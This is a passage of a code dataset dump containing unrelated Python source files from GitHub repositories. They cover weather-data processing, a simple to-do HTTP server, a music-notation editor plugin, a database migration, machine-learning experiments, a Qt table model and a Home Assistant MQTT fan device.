{d}.{m}.{y}\")\n return\n\n data = data_rs.loc[idx]\n unique_sids = data['sampleseries_id'].unique()\n grouped_rs_data = data.groupby('sampleseries_id') \n next_date = desired_date + datetime.timedelta(days=1)\n precip_data = get_MET_data(station='SN87110', data='sum(precipitation_amount PT10M)', period=f'{desired_date}/{next_date}')\n \n out = []\n for sid in unique_sids:\n ### RADIOSONDE DATA\n plot_data = grouped_rs_data.get_group(sid)\n time = pd.to_datetime(plot_data['UTC time'], utc=True)\n # time = np.array(time.dt.to_pydatetime()) # radiosonde launch time\n starttime_rs = time[0]\n stoptime_rs = time[-1]\n starttime_rs_string = starttime_rs.strftime('%Y-%m-%d %H:%M:%S')\n stoptime_rs_string = stoptime_rs.strftime('%Y-%m-%d %H:%M:%S')\n \n ### precipitation\n p0 = starttime_rs - datetime.timedelta(minutes=60)\n p1 = starttime_rs + datetime.timedelta(minutes=60)\n precipitation = precip_data[precip_data['referenceTime'].between(p0, p1)] # precipitation around radiosonde launch time\n \n if (precipitation.value > 0).any() :\n col = precipitation['referenceTime'].dt.tz_localize(None)\n precipitation = precipitation.assign(referenceTime=col)\n if len(out)==0:\n out = precipitation\n else:\n out = pd.concat([out, precipitation])\n\n if len(out)==0:\n return 0 \n else:\n return out\n\nwith open('dates_measurements.txt') as f:\n next(f)\n i = 0\n 
for line in f:\n if not line.strip():\n break\n date = line.rsplit(' ')[0]\n split = date.split('.')\n d = int(str.strip(split[0]))\n m = int(str.strip(split[1]))\n y = int('20' + str.strip(split[2])) \n\n df2 = run(y, m, d)\n if type(df2) == int:\n continue\n if i == 0:\n output = df2\n else:\n output = pd.concat([output, df2])\n i+=1\n \n with pd.ExcelWriter('precipitation.xlsx') as writer:\n output.to_excel(writer) ","repo_name":"tmpk/IceWarn","sub_path":"check_precipitation.py","file_name":"check_precipitation.py","file_ext":"py","file_size_in_byte":4721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"6844087132","text":"#!/usr/bin/env python\n\nimport argparse\nimport json\nfrom os import curdir, sep\nfrom BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer\n\nclass Database:\n\n def __init__(self):\n self.db = {}\n self.count = 0\n\n def add_note(self, note):\n self.count += 1\n self.db[self.count] = {'id': self.count, 'note': note}\n return self.db[self.count]\n\n def delete_note(self, id):\n if id in self.db:\n del self.db[id]\n return\n\n def get_notes(self):\n return self.db.values()\n\n\ndatabase = Database()\n\n\n# HTTPRequestHandler class\nclass todoHTTPServer_RequestHandler(BaseHTTPRequestHandler):\n\n backend_path = \"/todo\"\n \n # GET\n def do_GET(self):\n self.send_response(200)\n if self.path == self.backend_path:\n self.send_header('Content-type','application/json')\n self.end_headers()\n notes = database.get_notes()\n self.wfile.write(json.dumps(notes))\n else:\n path = '../frontend/'\n if self.path==\"/\":\n self.path=\"index.html\"\n elif self.path.endswith(\".html\"):\n mimetype='text/html'\n sendReply = True\n elif self.path.endswith(\".js\"):\n mimetype='application/javascript'\n sendReply = True\n elif self.path.endswith(\".css\"):\n mimetype='text/css'\n sendReply = True\n else:\n self.send_response(404)\n return\n f = open(curdir + sep + path + self.path)\n self.send_response(200)\n self.send_header('Content-type', mimetype)\n self.end_headers()\n self.wfile.write(f.read())\n f.close()\n return\n\n #POST\n def do_POST(self):\n if self.path == self.backend_path:\n length = int(self.headers['Content-length'])\n body = self.rfile.read(length)\n postvars = json.loads(body)\n note = postvars['todo']\n new_note = database.add_note(note)\n self.send_response(201)\n self.send_header('Content-type','application/json')\n self.end_headers()\n self.wfile.write(json.dumps(new_note))\n return\n\n def do_DELETE(self):\n if self.path.startswith(self.backend_path):\n id = int(self.path.split(\"/\")[2])\n print(id)\n database.delete_note(id)\n self.send_response(200)\n self.end_headers()\n return\n\ndef run():\n print('starting server...')\n server_address = ('127.0.0.1', 8081)\n httpd = HTTPServer(server_address, todoHTTPServer_RequestHandler)\n print('running server...')\n httpd.serve_forever()\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--run\", help=\"Run the server\",\n action=\"store_true\")\nargs = parser.parse_args()\nif args.run:\n run()\n","repo_name":"EducationalEra/taskManagerApp","sub_path":"server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2589,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"36002525049","text":"from PyQt5.QtWidgets import QAction\n\nimport actioncollection\nimport actioncollectionmanager\nimport plugin\n\n\nclass Rest(plugin.MainWindowPlugin):\n def __init__(self, 
mainwindow):\n        self.actionCollection = ac = Actions()\n        actioncollectionmanager.manager(mainwindow).addActionCollection(ac)\n        ac.rest_fmrest2spacer.triggered.connect(self.fmrest2spacer)\n        ac.rest_spacer2fmrest.triggered.connect(self.spacer2fmrest)\n        ac.rest_restcomm2rest.triggered.connect(self.restcomm2rest)\n\n    def fmrest2spacer(self):\n        from . import rest\n        cursor = self.mainwindow().textCursor()\n        rest.fmrest2spacer(cursor)\n\n    def spacer2fmrest(self):\n        from . import rest\n        cursor = self.mainwindow().textCursor()\n        rest.spacer2fmrest(cursor)\n\n    def restcomm2rest(self):\n        from . import rest\n        cursor = self.mainwindow().textCursor()\n        rest.restcomm2rest(cursor)\n\n\nclass Actions(actioncollection.ActionCollection):\n    name = \"rest\"\n    def createActions(self, parent):\n        self.rest_fmrest2spacer = QAction(parent)\n        self.rest_spacer2fmrest = QAction(parent)\n        self.rest_restcomm2rest = QAction(parent)\n\n    def translateUI(self):\n        self.rest_fmrest2spacer.setText(_(\n            \"Replace full measure rests with spacer rests\"))\n        self.rest_fmrest2spacer.setToolTip(_(\n            \"Change all R to s \"\n            \"in this document or in the selection.\"))\n        self.rest_spacer2fmrest.setText(_(\n            \"Replace spacer rests with full measure rests\"))\n        self.rest_spacer2fmrest.setToolTip(_(\n            \"Change all s to R \"\n            \"in this document or in the selection.\"))\n        self.rest_restcomm2rest.setText(_(\n            \"Replace positioned rests with plain rests\"))\n        self.rest_restcomm2rest.setToolTip(_(\n            \"Change all \\\\rest to r \"\n            \"in this document or in the selection.\"))\n\n","repo_name":"frescobaldi/frescobaldi","sub_path":"frescobaldi_app/rest/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","stars":673,"dataset":"github-code","pt":"38"}
{"seq_id":"25780342126","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\n@desc: A ball falls freely from a height of 100 meters; after each landing it bounces\n       back to half of its previous height, then falls again. Find the total distance\n       it has travelled when it lands for the 10th time, and the height of the 10th rebound.\n@author: Yuanhao Luo\n@contact: luoyuanhao@software.ict.ac.cn\n@file: exam20.py\n@time: 2016/12/21 19:41\n\"\"\"\n\n\ndef func(h, c):\n    dist = h\n    for i in range(c - 1):\n        dist += h\n        h /= 2\n    return dist, h / 2\n\n\nif __name__ == \"__main__\":\n    dist, h = func(100.0, 10)\n    print('dist = %f, h = %f' % (dist, h))\n","repo_name":"ictlyh/PythonExamples","sub_path":"exam20.py","file_name":"exam20.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
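# --- Editor's aside (illustrative sketch, not part of the original records) ---
# The loop in exam20.py above adds one full bounce (up plus down) per landing,
# with the bounce height halving each time. A quick closed-form cross-check via
# the geometric series, assuming the same parameters (100 m drop, 10 landings,
# rebound ratio 1/2):
h0, landings, ratio = 100.0, 10, 0.5
total = h0 + 2 * h0 * ratio * (1 - ratio ** (landings - 1)) / (1 - ratio)
rebound = h0 * ratio ** landings
assert abs(total - 299.609375) < 1e-9    # matches func(100.0, 10)[0]
assert abs(rebound - 0.09765625) < 1e-9  # matches func(100.0, 10)[1]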
{"seq_id":"8821963492","text":"\"\"\"\nAdd index to group.name column.\n\nRevision ID: 21f87f395e26\nRevises: 0d4755a0d88b\nCreate Date: 2016-03-24 15:12:59.803179\n\n\"\"\"\n\nimport sqlalchemy as sa\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = \"21f87f395e26\"\ndown_revision = \"0d4755a0d88b\"\n\n\ndef upgrade():\n    # Creating a concurrent index does not work inside a transaction\n    op.execute(\"COMMIT\")\n    op.create_index(\n        op.f(\"ix__group__name\"), \"group\", [\"name\"], postgresql_concurrently=True\n    )\n\n\ndef downgrade():\n    op.drop_index(op.f(\"ix__group__name\"), \"group\")\n","repo_name":"hypothesis/h","sub_path":"h/migrations/versions/21f87f395e26_add_group_name_index.py","file_name":"21f87f395e26_add_group_name_index.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":2810,"dataset":"github-code","pt":"38"}
{"seq_id":"28555636805","text":"#!/usr/bin/env python3\n\nimport os\nfrom ontobio.ontol_factory import OntologyFactory\n\nPATH_HPO = os.path.abspath(\"../ontologies/hpo.json\")\nPATH_MPO = os.path.abspath(\"../ontologies/mpo.json\")\n\nhpo = OntologyFactory().create(handle=PATH_HPO)\nmpo = OntologyFactory().create(handle=PATH_MPO)\n\ndef replace_terms_by_level(terms, ontology_type, level_terms):\n    \"\"\"\n    Takes list of terms, ontology type ('hp' or 'mp') \n    and list of target-level terms.\n    Returns a list of target-level terms that are\n    ancestors of input terms. \n    \"\"\"\n\n    result = set()\n    level_terms_set = set(level_terms)\n    \n    if ontology_type == 'hp':\n        for term in terms:\n            if term == '':\n                result.add('')\n                continue\n            if term in level_terms:\n                result.add(term)\n                continue\n\n            parents = set(hpo.ancestors(term, reflexive=False))\n            result_partial = level_terms_set.intersection(parents)\n            result.update(result_partial)\n\n    if ontology_type == 'mp':\n        for term in terms:\n            if term == '':\n                result.add('')\n                continue\n            if term in level_terms:\n                result.add(term)\n                continue\n            \n            parents = set(mpo.ancestors(term, reflexive=False))\n            result_partial = level_terms_set.intersection(parents)\n            result.update(result_partial)\n\n    return list(result)\n\n","repo_name":"pavlovanadia/genotype_to_phenotype","sub_path":"scripts/low2system.py","file_name":"low2system.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
{"seq_id":"13875798307","text":"import gc\nimport numpy as np\nfrom pandas import DataFrame as df\nfrom func_data import load_data\nfrom func_model import model\n\n\ndef nested(\n    model_dir=None,\n    n_runs=10,\n    layers_list=(2,),\n    neurons_per_layer_list=(10,),\n    training_steps_list=(2000,),\n    training_items_list=(42,)\n):\n    result_dict = {\n        'layers': [],\n        'neurons_per_layer': [],\n        'training_step': [],\n        'training_data': [],\n        'test accuracy': [],\n        'train accuracy': [],\n    }\n\n    train_individual_accuracy_all = []\n    test_individual_accuracy_all = []\n\n    count_sim = 0\n    total_sim = len(layers_list) * len(neurons_per_layer_list) * len(training_steps_list) * len(\n        training_items_list) * n_runs - 1\n\n    for layers in layers_list:\n        for neurons_per_layer in neurons_per_layer_list:\n            for training_steps in training_steps_list:\n                for training_items in training_items_list:\n\n                    train_individual_accuracy = []\n                    test_individual_accuracy = []\n\n                    for i in np.arange(0, n_runs):\n                        print('{}/{}'.format(count_sim, total_sim))\n                        count_sim += 1\n\n                        train, test = load_data(n_train=training_items, shuffle=True)\n\n                        train_accuracy, test_accuracy = model(\n                            train, test,\n                            model_dir=model_dir,\n                            training_steps=training_steps,\n                            layers=layers,\n                            neurons_per_layer=neurons_per_layer\n                        )\n\n                        train_individual_accuracy.append(train_accuracy)\n                        test_individual_accuracy.append(test_accuracy)\n\n                    train_individual_accuracy_all.append(train_individual_accuracy)\n                    test_individual_accuracy_all.append(test_individual_accuracy)\n\n                    result_dict['layers'].append(layers)\n                    result_dict['neurons_per_layer'].append(neurons_per_layer)\n                    result_dict['training_step'].append(training_steps)\n                    result_dict['training_data'].append(training_items)\n                    result_dict['test accuracy'].append(np.average(test_individual_accuracy))\n                    result_dict['train accuracy'].append(np.average(train_individual_accuracy))\n\n    test_individual_accuracy_all = np.asarray(test_individual_accuracy_all)\n    train_individual_accuracy_all = np.asarray(train_individual_accuracy_all)\n    np.savetxt('results_test_accuracy4.csv', test_individual_accuracy_all, delimiter=',')\n    np.savetxt('results_train_accuracy4.csv', 
train_individual_accuracy_all, delimiter=',')\n\n df_result = df.from_dict(result_dict)\n df_result.to_csv('results_summary4.csv')\n\n # shutil.rmtree(model_dir, ignore_errors=True)\n\n gc.collect()","repo_name":"PySFE/ctbuh_alpha","sub_path":"project/func_ana.py","file_name":"func_ana.py","file_ext":"py","file_size_in_byte":2928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"33918356158","text":"#\n# Hello World server in Python\n# Binds REP socket to tcp://*:7331\n# Expects b\"Hello\" from client, replies with b\"World\"\n#\nimport os\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"-1\"\nimport time\nimport zmq\nimport md_config as cfg\nimport numpy as np\nimport pandas as pd\nfrom tensorflow import keras\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import LSTM, CuDNNLSTM, Dense, TimeDistributed, GlobalAveragePooling1D, Activation, \\\n BatchNormalization\nimport h5py\nimport copy\n\ndef define_model(hparams):\n current_n_lstms = hparams['NUM_LSTM_LAYERS']\n current_lstm_units = hparams['LSTM_UNITS']\n current_n_denses = hparams['NUM_DENSE_LAYERS']\n current_dense_units = hparams['DENSE_UNITS']\n current_dropout_rates = hparams['DROPOUT_RATES']\n current_time_step = hparams['TIME_STEP']\n current_input_units = hparams['INPUT_UNITS']\n current_densen_act = hparams['ACTIVATION_F']\n\n model = Sequential()\n if hparams['FC1'][1] > 0:\n model.add(TimeDistributed(Dense(hparams['FC1'][1], activation='relu'),\n input_shape=(current_time_step, hparams['FC1'][0])))\n\n model.add(LSTM(current_lstm_units[0], return_sequences=True, input_shape=(current_time_step, current_input_units),\n stateful=False))\n # CuDNNLSTM(current_lstm_units[0], return_sequences=True, input_shape=(current_time_step, current_input_units),\n # stateful=False))\n\n if current_n_lstms > 1:\n for idx in range(1, current_n_lstms):\n model.add(LSTM(current_lstm_units[idx], return_sequences=True))\n # model.add(CuDNNLSTM(current_lstm_units[idx], return_sequences=True))\n\n for idx in range(current_n_denses):\n model.add(TimeDistributed(Dense(current_dense_units[idx], activation='relu')))\n # model.add(TimeDistributed(Dropout(0.3)))\n\n model.add(TimeDistributed(Dense(1, activation=current_densen_act)))\n model.add(GlobalAveragePooling1D())\n\n return model\n\ndef load_weights_to_model(current_model, hparams, ft_type):\n \"\"\" Only apply to the LSTM model in this file, for other models, try to change :v\"\"\"\n f = h5py.File('./models/{}_{}_models_{}_{}_0_epochs{}_best_weight.h5'.format(hparams['model_path'], ft_type,\n hparams['n_segments'],\n hparams['alpha'],\n hparams['EPOCHS']), 'r')\n print(list(f.keys()))\n\n # tmp2 = current_model.layers[6].get_weights()\n\n current_model.layers[0].set_weights([f['time_distributed_2']['time_distributed_2']['kernel:0'].value,\n f['time_distributed_2']['time_distributed_2']['bias:0'].value])\n current_model.layers[1].set_weights(\n [f['cu_dnnlstm']['cu_dnnlstm']['kernel:0'].value, f['cu_dnnlstm']['cu_dnnlstm']['recurrent_kernel:0'].value,\n f['cu_dnnlstm']['cu_dnnlstm']['bias:0'].value])\n current_model.layers[2].set_weights([f['cu_dnnlstm_1']['cu_dnnlstm_1']['kernel:0'].value,\n f['cu_dnnlstm_1']['cu_dnnlstm_1']['recurrent_kernel:0'].value,\n f['cu_dnnlstm_1']['cu_dnnlstm_1']['bias:0'].value])\n current_model.layers[3].set_weights([f['time_distributed']['time_distributed']['kernel:0'].value,\n f['time_distributed']['time_distributed']['bias:0'].value])\n 
current_model.layers[4].set_weights([f['time_distributed_1']['time_distributed_1']['kernel:0'].value,\n f['time_distributed_1']['time_distributed_1']['bias:0'].value])\n current_model.layers[5].set_weights([f['time_distributed_3']['time_distributed_3']['kernel:0'].value,\n f['time_distributed_3']['time_distributed_3']['bias:0'].value])\n\n f.close()\n return current_model\n\ndef get_gaze_features(raw_input):\n \"\"\"\n Get gaze features from raw input\n :param raw_input:\n :return:\n \"\"\"\n # Get statiscal feature from raw input\n gaze_direction = raw_input[:, 5:11]\n gaze_angle = raw_input[:, 11: 13]\n eye_landmark2D = raw_input[:, 13: 125]\n eye_landmark3D = raw_input[:, 125: 293]\n pose_direction = raw_input[:, 293: 299]\n face_landmark2D = raw_input[:, 299: 435]\n face_landmark3D = raw_input[:, 435: 679]\n au_reg = raw_input[:, 679: 695]\n au_cls = raw_input[:, 695: 713]\n\n gaze_direction_std = np.std(gaze_direction, axis=0)\n gaze_direction_mean = np.mean(gaze_direction, axis=0)\n\n gaze_angle_std = np.std(gaze_angle, axis=0)\n gaze_angle_mean = np.mean(gaze_angle, axis=0)\n\n eye_landmark2D_shape_0 = np.abs(eye_landmark2D[:, 56 + 9: 56 + 14] - eye_landmark2D[:, 56 + 19: 56 + 14: -1])\n eye_landmark2D_shape_1 = np.abs(eye_landmark2D[:, 56 + 37: 56 + 42] - eye_landmark2D[:, 56 + 47: 56 + 42: -1])\n eye_landmark2D_shape = np.hstack((eye_landmark2D_shape_0, eye_landmark2D_shape_1))\n eye_landmark2D_shape_cov = np.divide(np.std(eye_landmark2D_shape, axis=0),\n np.mean(eye_landmark2D_shape, axis=0))\n\n eye_distance = 0.5 * (eye_landmark3D[:, 56 * 2 + 8] + eye_landmark3D[:, 56 * 2 + 42])\n eye_distance_cov = np.std(eye_distance) / np.mean(eye_distance)\n eye_distance_ratio = np.min(eye_distance) / np.max(eye_distance)\n eye_distance_fea = np.array([eye_distance_cov, eye_distance_ratio])\n\n eye_location2D = []\n for idx in range(4):\n cur_mean = np.mean(eye_landmark2D[:, 28 * idx: 28 * (idx + 1)], axis=1)\n eye_location2D.append(cur_mean)\n\n eye_location2D = np.vstack(eye_location2D).T\n eye_location2D_mean = np.mean(eye_location2D, axis=0)\n eye_location2D_std = np.std(eye_location2D, axis=0)\n\n eye_location3D = []\n for idx in range(6):\n cur_mean = np.mean(eye_landmark3D[:, 28 * idx: 28 * (idx + 1)], axis=1)\n eye_location3D.append(cur_mean)\n eye_location3D = np.vstack(eye_location3D).T\n eye_location3D_mean = np.mean(eye_location3D, axis=0)\n eye_location3D_std = np.std(eye_location3D, axis=0)\n\n pose_direction_mean = np.mean(pose_direction, axis=0)\n pose_direction_std = np.std(pose_direction, axis=0)\n ret_features = np.hstack((gaze_direction_std, gaze_direction_mean, gaze_angle_mean, gaze_angle_std,\n eye_landmark2D_shape_cov, eye_location2D_mean, eye_location2D_std,\n eye_location3D_mean,\n eye_location3D_std, eye_distance_fea, pose_direction_mean, pose_direction_std))\n\n return ret_features\n\ndef parse_df(df_path, n_segments=15, alpha=0.5, prev_frames=-1):\n try:\n df = pd.read_csv(df_path, header=0, sep=',').values\n face_id = df[:, 1]\n seq_length = df.shape[0]\n # print(\"Seq length: \", seq_length)\n if seq_length < 100:\n return None\n indexing = int((n_segments - 1) * (1 - alpha))\n k_value = seq_length // (1 + indexing) # In some case, we will ignore some last frames\n\n ret = []\n index_st = 0\n for idx in range(n_segments):\n index_ed = k_value + int(k_value * (1 - alpha) * idx)\n index_features = get_gaze_features(df[index_st: index_ed, :])\n ret.append(index_features)\n index_st = index_ed - int((1 - alpha) * k_value)\n\n ret = np.vstack(ret)\n except:\n 
print('IO error')\n ret = None\n\n return ret\n\ndef get_model(model_index, n_segments=15, input_units=60):\n \"\"\"\n Make prediction for data_npy\n :param data_npy:\n :return:\n \"\"\"\n ld_cfg = cfg.md_cfg\n hparams = copy.deepcopy(ld_cfg[model_index])\n\n if 'VGG' in hparams['NAME']:\n ft_type = 'vgg2'\n elif 'OF' in hparams['NAME']:\n ft_type = 'of'\n else:\n ft_type = 'au'\n\n hparams['TIME_STEP'] = n_segments\n hparams['INPUT_UNITS'] = hparams['FC1'][1] if hparams['FC1'][1] > 0 else input_units\n hparams['optimizer'] = 'adam'\n hparams['ACTIVATION_F'] = 'tanh'\n hparams['CLSW'] = 1\n\n cur_model = define_model(hparams)\n cur_model.build()\n # load_weights_to_model(cur_model, hparams, ft_type)\n cur_model.load_weights(\n './models/{}_{}_models_{}_{}_0_epochs{}_best_weight.h5'.format(hparams['model_path'], ft_type,\n hparams['n_segments'], hparams['alpha'],\n hparams['EPOCHS']))\n\n return cur_model\n\nif __name__ == '__main__':\n context = zmq.Context()\n socket = context.socket(zmq.REP)\n socket.bind(\"tcp://*:7331\")\n\n # Model index: 0, 1 for VGG_SE and 2, 3 for EyeGaze_HeadPose\n eye_gaze_v1 = get_model(model_index=2)\n eye_gaze_v2 = get_model(model_index=3)\n prev_frames = -1\n while True:\n # Wait for next request from client\n message = socket.recv()\n # print(\"Received request: %s\" % message)\n df_path = message.decode(\"utf-8\")\n # print(df_path)\n eye_gaze_features = parse_df(df_path, n_segments=15, alpha=0.5, prev_frames=prev_frames)\n\n if eye_gaze_features is not None:\n # print(eye_gaze_features.shape)\n eye_gaze_features = eye_gaze_features[np.newaxis, :]\n # print(eye_gaze_features.shape)\n\n v1 = eye_gaze_v1.predict(eye_gaze_features)[0][0]\n v2 = eye_gaze_v2.predict(eye_gaze_features)[0][0]\n enga_score = 0.5*(v1 + v2)\n # Do some 'work'\n # time.sleep(.300)\n send_str = \"{:.5f}\".format(enga_score)\n # Send reply back to client\n socket.send(send_str.encode('ascii'))\n else:\n socket.send(b'NA')","repo_name":"littleZY/SML_EW_EmotiW2019","sub_path":"EW_zmq.py","file_name":"EW_zmq.py","file_ext":"py","file_size_in_byte":9882,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"38"} +{"seq_id":"4343137799","text":"\nimport re\nimport logging\n\nfrom plow.gui.manifest import QtCore, QtGui\n\nLOGGER = logging.getLogger(__name__)\n\nDATA_ROLE = QtCore.Qt.UserRole \n\n_ALNUM_RX = re.compile('([0-9]+)')\n\ndef alphaNumericKey(aString):\n return [ int(c) if c.isdigit() else c for c in _ALNUM_RX.split(aString) ]\n\n\nclass AlnumSortProxyModel(QtGui.QSortFilterProxyModel):\n\n RX_ALNUMS = QtCore.QRegExp('(\\d+|\\D+)')\n\n def __init__(self, *args, **kwargs):\n super(AlnumSortProxyModel, self).__init__(*args, **kwargs)\n\n self.setSortRole(DATA_ROLE)\n self.__validAlnum = (str, unicode)\n\n def lessThan(self, left, right):\n sortRole = self.sortRole()\n leftData = left.data(sortRole)\n\n if isinstance(leftData, self.__validAlnum):\n \n rightData = right.data(sortRole)\n\n if leftData == rightData:\n return False\n\n return alphaNumericKey(leftData) < alphaNumericKey(rightData)\n\n return super(AlnumSortProxyModel, self).lessThan(left, right)\n\n\nclass PlowTableModel(QtCore.QAbstractTableModel):\n\n # A list of string headers for the model\n HEADERS = []\n\n # Map column number => callback that provides a string display val\n # for a given plow object\n DISPLAY_CALLBACKS = {}\n\n IdRole = QtCore.Qt.UserRole\n ObjectRole = QtCore.Qt.UserRole + 1\n DataRole = QtCore.Qt.UserRole + 2\n\n def __init__(self, parent=None):\n 
QtCore.QAbstractTableModel.__init__(self, parent)\n self._items = []\n self._index = {}\n\n self.__columnCount = len(self.HEADERS)\n\n # Should the refresh operation remove existing\n # items that are not found in each new update?\n self.refreshShouldRemove = True\n\n def fetchObjects(self):\n \"\"\"\n Method that should be defined in subclasses, \n to fetch new data that will be applied to the model. \n\n Should return a list of objects\n \"\"\"\n return []\n\n def hasChildren(self, parent):\n return False\n\n def refresh(self):\n updated = set()\n to_add = set()\n object_ids = set()\n\n rows = self._index\n columnCount = self.columnCount()\n parent = QtCore.QModelIndex()\n\n objects = self.fetchObjects()\n\n # Update existing\n for obj in objects:\n object_ids.add(obj.id)\n\n try:\n idx = self._index[obj.id]\n self._items[idx] = obj\n updated.add(obj.id)\n self.dataChanged.emit(self.index(idx,0), self.index(idx, columnCount-1))\n \n except (IndexError, KeyError):\n to_add.add(obj) \n\n # Add new\n if to_add:\n size = len(to_add)\n start = len(self._items)\n end = start + size - 1\n self.beginInsertRows(parent, start, end)\n self._items.extend(to_add)\n self.endInsertRows()\n LOGGER.debug(\"adding %d new objects\", size)\n\n # Remove missing\n if self.refreshShouldRemove:\n to_remove = set(self._index.iterkeys()).difference(object_ids)\n if to_remove:\n row_ids = ((rows[old_id], old_id) for old_id in to_remove)\n \n for row, old_id in sorted(row_ids, reverse=True):\n\n self.beginRemoveRows(parent, row, row)\n obj = self._items.pop(row)\n self.endRemoveRows()\n\n LOGGER.debug(\"removing %s %s\", old_id, obj.name)\n\n # reindex the items\n self._index = dict(((item.id, i) for i, item in enumerate(self._items)))\n\n def rowCount(self, parent):\n if parent and parent.isValid():\n return 0\n return len(self._items)\n\n def columnCount(self, parent=None):\n if parent and parent.isValid():\n return 0\n return self.__columnCount\n\n def data(self, index, role):\n row = index.row()\n col = index.column()\n obj = self._items[row]\n\n if role == QtCore.Qt.DisplayRole:\n cbk = self.DISPLAY_CALLBACKS.get(col)\n if cbk is not None:\n return cbk(obj)\n \n elif role == QtCore.Qt.TextAlignmentRole:\n if col != 0:\n return QtCore.Qt.AlignCenter\n\n elif role == self.IdRole:\n return obj.id\n \n elif role == self.ObjectRole:\n return obj\n\n return None\n\n def setItemList(self, itemList):\n self.beginResetModel()\n self._items = itemList\n self._index = dict((n.id, row) for row, n in enumerate(itemList))\n self.endResetModel()\n\n def itemFromIndex(self, idx):\n if not idx.isValid():\n return None \n\n item = self._items[idx.row()]\n return item\n\n def headerData(self, section, orientation, role):\n if role == QtCore.Qt.TextAlignmentRole:\n if section == 0:\n return QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter \n else:\n return QtCore.Qt.AlignCenter\n\n if role != QtCore.Qt.DisplayRole:\n return None \n\n if orientation == QtCore.Qt.Vertical:\n return section \n\n return self.HEADERS[section]","repo_name":"chadmv/plow","sub_path":"lib/python/plow/gui/common/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5235,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"38"} +{"seq_id":"7011270788","text":"import indigo\nfrom hassbridge import TOPIC_ROOT, get_mqtt_client\n\nfrom .base import BaseCommandableHADevice\n\n\nclass Fan(BaseCommandableHADevice):\n DEFAULT_STATE_TOPIC = TOPIC_ROOT + \"/fan/status\"\n COMMAND_TOPIC_TEMPLATE = TOPIC_ROOT + 
\"/fan/switch\"\n\n def __init__(self, indigo_entity, overrides, logger, discovery_prefix):\n super(Fan, self).__init__(indigo_entity, overrides, logger,\n discovery_prefix)\n self.config.update({\n self.PERCENTAGE_COMMAND_TOPIC_KEY: self.percentage_command_topic,\n self.PERCENTAGE_STATE_TOPIC_KEY: self.percentage_state_topic,\n self.SPEED_RANGE_MIN_KEY: self.speed_range_min,\n self.SPEED_RANGE_MAX_KEY: self.speed_range_max\n })\n\n @property\n def hass_type(self):\n return \"fan\"\n\n SPEED_RANGE_MIN_KEY = \"speed_range_min\"\n\n @property\n def speed_range_min(self):\n return 1\n\n SPEED_RANGE_MAX_KEY = \"speed_range_max\"\n\n @property\n def speed_range_max(self):\n return 3\n\n PERCENTAGE_STATE_TOPIC_TEMPLATE = TOPIC_ROOT + \"/speed/percentage_state\"\n PERCENTAGE_STATE_TOPIC_KEY = \"percentage_state_topic\"\n\n @property\n def percentage_state_topic(self):\n return self._overrideable_get(\n self.PERCENTAGE_STATE_TOPIC_KEY,\n self.PERCENTAGE_STATE_TOPIC_TEMPLATE).format(d=self)\n\n PERCENTAGE_COMMAND_TOPIC_TEMPLATE = TOPIC_ROOT + \"/speed/percentage_command\"\n PERCENTAGE_COMMAND_TOPIC_KEY = \"percentage_command_topic\"\n\n PERCENTAGE_STATE_TOPIC_RETAIN_KEY = \"percentage_state_topic_retain\"\n DEFAULT_PERCENTAGE_STATE_TOPIC_RETAIN = True\n\n @property\n def percentage_state_topic_retain(self):\n return bool(self._overrideable_get(\n self.PERCENTAGE_STATE_TOPIC_RETAIN_KEY,\n self.DEFAULT_PERCENTAGE_STATE_TOPIC_RETAIN))\n\n @property\n def percentage_command_topic(self):\n return self._overrideable_get(\n self.PERCENTAGE_COMMAND_TOPIC_KEY,\n self.PERCENTAGE_COMMAND_TOPIC_TEMPLATE).format(d=self)\n\n def register(self):\n super(Fan, self).register()\n\n # register brightness command topic\n self.logger.debug(\n u\"Subscribing {} with id {}:{} to speed command topic {}\"\n .format(self.hass_type, self.name, self.id,\n self.percentage_command_topic))\n get_mqtt_client().message_callback_add(\n self.percentage_command_topic,\n self.on_percentage_command_message)\n get_mqtt_client().subscribe(self.percentage_command_topic)\n self.__send_percentage_state(self.indigo_entity)\n\n # pylint: disable=unused-argument\n def on_percentage_command_message(self, client, userdata, msg):\n indigo.speedcontrol.setSpeedIndex(\n self.id,\n value=int(msg.payload))\n\n def update(self, orig_dev, new_dev):\n super(Fan, self).update(orig_dev, new_dev)\n self.__send_percentage_state(new_dev)\n\n def __send_percentage_state(self, dev):\n get_mqtt_client().publish(\n topic=self.percentage_state_topic,\n payload=unicode(dev.speedIndex),\n retain=self.percentage_state_topic_retain)\n\n def cleanup(self):\n self.logger.debug(\n u'Cleaning up percentage_state_topic mqtt topics for device '\n u'{d[name]}:{d[id]} on topic {d[speed_state_topic]}'.format(d=self))\n get_mqtt_client().publish(\n topic=self.percentage_state_topic,\n payload='',\n retain=False)\n super(Fan, self).cleanup()\n","repo_name":"wonderslug/hassbridge","sub_path":"HassBridge.indigoPlugin/Contents/Server Plugin/hass_devices/fan.py","file_name":"fan.py","file_ext":"py","file_size_in_byte":3585,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"38"} +{"seq_id":"11603644169","text":"import unittest\nfrom math import inf as infinity\n\nfrom source.tbn import Tbn\nfrom source.monomer import 